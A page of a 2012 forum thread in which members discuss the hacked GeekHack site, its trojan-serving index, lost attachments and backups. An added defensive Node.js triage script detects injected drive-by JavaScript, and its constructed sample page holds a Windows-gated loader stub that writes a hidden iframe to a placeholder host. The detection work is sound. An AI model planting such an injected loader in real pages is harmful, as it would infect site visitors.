Page 23 of 38

Posted: 28 Jun 2012, 08:57
by lorem3k
Sifo wrote:Guess I'll chill here. I asked r00tw0rm what they want with GH, didn't get a straight up response.
I'll bet they're after the domain name, it would be quite fitting for a hacking organization after all.

Posted: 28 Jun 2012, 08:59
by TexasFlood
Sifo wrote:I'm being sent trojans from index. Even just typing in the URL to my browser O_O
If it's Trojan:JS/Alescurf.C a.k.a. Trojan.JS.WPress.A (BitDefender) a.k.a. Troj/JSRedir-EQ (Sophos) then it's what I described above.

Posted: 28 Jun 2012, 09:00
by codehead
And oh the humanity... These god damn script kiddies who actually post videos on some search'n'replace Perl crap they'd written. Nice traces left by using a localized Linux. http://www.youtube.com/watch?v=xCf54VeHipc

Just like those assholes who fucked up one of my other favorite sites, scenemusic.net. But luckily those guys rewrote the whole thing.

:evil:

Posted: 28 Jun 2012, 09:01
by codehead
AND THEN THEY CALL THIS PIECE OF JUNK 'DEFACER'! OH GOD!

Posted: 28 Jun 2012, 09:08
by Sifo
TexasFlood wrote:
Sifo wrote:I'm being sent trojans from index. Even just typing in the URL to my browser O_O
If it's Trojan:JS/Alescurf.C a.k.a. Trojan.JS.WPress.A (BitDefender) a.k.a. Troj/JSRedir-EQ (Sophos) then it's what I described above.
JS/TrojanDownloader.Psyme.NCW trojan

Posted: 28 Jun 2012, 09:25
by TexasFlood
Sifo wrote:
TexasFlood wrote:
Sifo wrote:I'm being sent trojans from index. Even just typing in the URL to my browser O_O
If it's Trojan:JS/Alescurf.C a.k.a. Trojan.JS.WPress.A (BitDefender) a.k.a. Troj/JSRedir-EQ (Sophos) then it's what I described above.
JS/TrojanDownloader.Psyme.NCW trojan
Really? Wow, looked that up, discovered in 2004!

Posted: 28 Jun 2012, 09:34
by Sifo
TexasFlood wrote: Really? Wow, looked that up, discovered in 2004!
Anything important about it? I couldn't find anything.

Posted: 28 Jun 2012, 10:07
by captain
rknize wrote:German and Belgium beer yum. If I brew I'll gain 100 lbs, lol.
Haha! Funny you say that, because I have lost 20lbs since restarting the brewery. Must be all that Vitamin B! ;-)

Posted: 28 Jun 2012, 11:21
by metafour
Why is the site even up at this point?

Posted: 28 Jun 2012, 11:25
by The_Ed
Image

Posted: 28 Jun 2012, 11:46
by dirge
Ouch, that's pretty nasty.

Are our passwords safe on that site?

Posted: 28 Jun 2012, 11:53
by mintberryminuscrunch
dirge wrote:Ouch, that's pretty nasty.

Are our passwords safe on that site?
guess not, better start changing if you use it on other sites

Posted: 28 Jun 2012, 12:14
by Lorem-Ipsum
I've had a quick look through the JavaScript and from what I can see it only really tried to do anything on Windows.

Just guessing here but I would have thought that they would run detection scripts against the connecting browser to identify it and the OS, and if they have an exploit for that match, then run it.

If you're a Windows user, take Ripster's advice and turn off JavaScript, make sure your browser is up to date (potentially removes exploits they could be using) and make sure you have a good, up-to-date anti-virus.

If you're a Firefox user I recommend using the NoScript add-on, it basically blocks all JavaScript unless you allow it.
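
A triage script for the kind of injected JavaScript discussed in the post above, added here as an example; it is not part of the original thread and not code from GeekHack or from anyone in it. It pulls inline scripts and iframe tags out of an HTML document and scores them against generic drive-by indicators: OS/browser gating through navigator, code assembled from strings and fed to document.write/unescape or eval, and zero-size or hidden iframes. The sample page, the injected script and the loader.example.invalid domain are constructed placeholders, not the real injection.

```javascript
// Added example: regex-based triage of a page suspected of carrying an
// injected drive-by loader. No HTML parser on purpose, so it runs with plain
// Node; it is a triage aid for deciding whether to look closer, not proof of malice.
'use strict';

// Indicators with rough weights. Assumed thresholds, not from any published ruleset.
const INDICATORS = [
  { name: 'platform-gating',     re: /navigator\.(userAgent|platform|appVersion)/, weight: 2 },
  { name: 'unescape-to-dom',     re: /document\.write\s*\(\s*unescape/,            weight: 3 },
  { name: 'eval-of-string',      re: /\beval\s*\(/,                                weight: 2 },
  { name: 'charcode-assembly',   re: /String\.fromCharCode/,                       weight: 2 },
  { name: 'percent-encoded-tag', re: /%3[cC]iframe/,                               weight: 3 },
  { name: 'hidden-iframe',       re: /<iframe[^>]*(?:width|height)\s*=\s*["']?0\b/i, weight: 3 },
  { name: 'offscreen-style',     re: /visibility\s*:\s*hidden|display\s*:\s*none|left\s*:\s*-\d{3,}px/i, weight: 1 },
];

// Bodies of inline <script> blocks; external scripts (src=) carry nothing inline to score.
function extractInlineScripts(html) {
  const out = [];
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    if (/\bsrc\s*=/i.test(m[1])) continue;
    out.push(m[2]);
  }
  return out;
}

// Opening <iframe ...> tags only; the closing tag has no attributes to inspect.
function extractIframes(html) {
  return html.match(/<iframe\b[^>]*>/gi) || [];
}

// Sum the weights of every indicator that fires on one fragment.
function scoreFragment(fragment) {
  const hits = INDICATORS.filter(ind => ind.re.test(fragment));
  return { score: hits.reduce((s, h) => s + h.weight, 0), hits: hits.map(h => h.name) };
}

// Score every fragment and return those at or above the threshold.
function triagePage(html, threshold = 4) {
  const fragments = [...extractInlineScripts(html), ...extractIframes(html)];
  const suspicious = fragments
    .map((frag, i) => ({ index: i, ...scoreFragment(frag), excerpt: frag.trim().slice(0, 80) }))
    .filter(f => f.score >= threshold);
  return { fragments: fragments.length, suspicious };
}

// Constructed sample page: one benign theme toggle, one gated loader stub, one hidden iframe.
const SAMPLE_HTML = `<html><head>
<script>var gh = {theme: 'dark'}; function toggle(){ gh.theme = gh.theme === 'dark' ? 'light' : 'dark'; }</script>
</head><body>
<h1>Forum</h1>
<script>if(navigator.platform.indexOf("Win")!=-1){document.write(unescape("%3Ciframe src=%22http://loader.example.invalid/in.php%22 width=0 height=0%3E%3C/iframe%3E"));}</script>
<iframe src="http://loader.example.invalid/in.php" width="0" height="0" style="visibility:hidden"></iframe>
</body></html>`;

console.log(JSON.stringify(triagePage(SAMPLE_HTML), null, 2));
```

Run it with `node triage.js` against a saved copy of the suspect page (fetch it with curl or wget, not a browser, so nothing executes). On the constructed sample the benign script scores 0, the gated loader scores 8 and the hidden iframe scores 4. Real loaders change their obfuscation between waves, so treat a hit as a reason to read the fragment by hand, and a miss as nothing more than "none of these patterns fired".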

Posted: 28 Jun 2012, 12:22
by The_Ed
At least they aren't giving me another infraction for saying fuck (yet).

Posted: 28 Jun 2012, 12:27
by codehead
I still think it's unacceptable that they've gotten hacked so many times and didn't manage to do much about it. "Lost almost all attachments". Umm, where are the filesystem level backups etc.? GeekHack is a source of information for many and it's completely irresponsible to NOT have backups for this kind of valuable community generated information!

Posted: 28 Jun 2012, 12:27
by Icarium
Damn. Wanted to look up something about switches earlier...

I hate to see GH struggle like this; there was a TON of GREAT content.
Sure, there was a lot of noise to dig it out from, but still...

Posted: 28 Jun 2012, 12:33
by 7bit
Icarium wrote:Damn. Wanted to look up something about switches earlier...

I hate to see GH struggle like this; there was a TON of GREAT content.
Sure, there was a lot of noise to dig it out from, but still...
Just look into the wiki!

Posted: 28 Jun 2012, 12:36
by Ekaros
Maybe it's time for name change? ;D

How many times has it been down this year?

Posted: 28 Jun 2012, 12:44
by mintberryminuscrunch
Ekaros wrote:Maybe it's time for name change? ;D

How many times has it been down this year?
geekhacked.org ?

Posted: 28 Jun 2012, 13:14
by metafour
It's almost a certainty that the database will need to be restored from an earlier backup. Every new post that goes up there right now will eventually get blown away when this happens. Also, if the main page is really attempting to infect visitors computers why is the site being kept up? Take it offline and assess the situation.

Posted: 28 Jun 2012, 13:17
by 7bit
metafour wrote:It's almost a certainty that the database will need to be restored from an earlier backup. Every new post that goes up there right now will eventually get blown away when this happens. Also, if the main page is really attempting to infect visitors computers why is the site being kept up? Take it offline and assess the situation.
Can't see it is up anymore:

Posted: 28 Jun 2012, 13:24
by metafour
What are you trying to say or show? If that's what you get when you visit the site's main page then clearly the site is still up.

You can still get to the geekhack forums if you use URLs that aren't the main site index page.

I.e. http://geekhack.org/showthread.php?3296 ... -Redirects

Posted: 28 Jun 2012, 13:26
by baldgye
Really sad, I don't think that GH should simply give up against these retarded wannabe hackers... I mean really, what does a name matter?

Just annoying because it can totally ruin some of the group buys running.

Posted: 28 Jun 2012, 13:31
by agor
All attachments lost? So there hasn't EVER been a backup?

Posted: 28 Jun 2012, 13:35
by baldgye
7bit wrote:
metafour wrote:It's almost a certainty that the database will need to be restored from an earlier backup. Every new post that goes up there right now will eventually get blown away when this happens. Also, if the main page is really attempting to infect visitors computers why is the site being kept up? Take it offline and assess the situation.
Can't see it is up anymore:
Every time I go up, AVG goes mad and there is text scrolling across the page...

Posted: 28 Jun 2012, 13:36
by metafour
The problem is that it has happened a number of times now. If more secure software is not going to be used then I think moving to a different domain needs to be tested to see if the intrusions cease.

Seriously though, as soon as the admin of an exploited site is aware of the exploit the server should be taken offline. It's your responsibility as a sys admin to protect other users of the Internet. This also makes forensics and analysis easier.

When you have an infected computer on a private network the first thing you do is remove it from the network. The same principle applies here. The site should not be up and accessible to the public.

Posted: 28 Jun 2012, 13:43
by baldgye
yeah especially if its trying to infect people

Posted: 28 Jun 2012, 13:52
by 7bit
metafour wrote:The problem is that it has happened a number of times now. If more secure software is not going to be used then I think moving to a different domain needs to be tested to see if the intrusions cease.
...
The domain name will not change much!

Solution for GeekHack:
- moving to a new software
- moving to a new backup system
- moving to deskthority.org

I take the 3rd solution.
:-)

Posted: 28 Jun 2012, 13:53
by baldgye
Before switching software and backup, they really should work out how they were hacked and what could prevent it...

Posted: 28 Jun 2012, 13:56
by Acanthophis
3rd solution would be a disaster...